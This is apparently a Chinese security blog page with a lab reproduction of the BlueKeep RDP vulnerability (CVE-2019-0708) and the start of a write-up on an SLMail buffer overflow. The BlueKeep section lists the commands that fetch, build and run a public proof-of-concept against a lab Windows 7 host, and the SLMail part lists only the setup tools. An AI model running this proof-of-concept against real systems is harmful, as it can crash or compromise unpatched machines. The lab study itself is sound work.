CVE-2019-0708

漏洞验证

复现环境:

攻击机:Kali Linux(Windows子系统)

目标主机:Windows 7 SP1 64位

准备环境|Poc下载/编译

1
2
3
4
5
6
7
8
9
sudo apt install dh-autoreconf
sudo apt install libssl-dev
sudo apt install libx11-dev
git clone https://github.com/zerosum0x0/CVE-2019-0708.git
cd CVE-2019-0708/rdesktop-fork-bd6aa6acddf0ba640a49834807872f4cc0d0a773/
./bootstrap
./configure --disable-credssp --disable-smartcard
make
./rdesktop 192.168.1.7:3389

Windows系统安全之SLMail缓冲区溢出漏洞复现

在我大二时任技术交流协会信安部部长时我曾给学弟学妹们介绍过这个关于SLMail的缓冲区溢出漏洞,给他们讲的原因是想扩展一下他们的知识面,现在我再重新温习一下这个漏洞来跟现阶段学习的Linux缓冲区漏洞做一个对比


环境搭建

首先需要搭建实验环境,系统可选用Windows_XP,因为Windows7及以上的系统内置了多种安全措施使得此漏洞难以利用,本实验用到的软件及下载链接如下:

SLMail 5.5.0 Mail Server

ImmunityDebugger_1_85_setup

mona.py

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×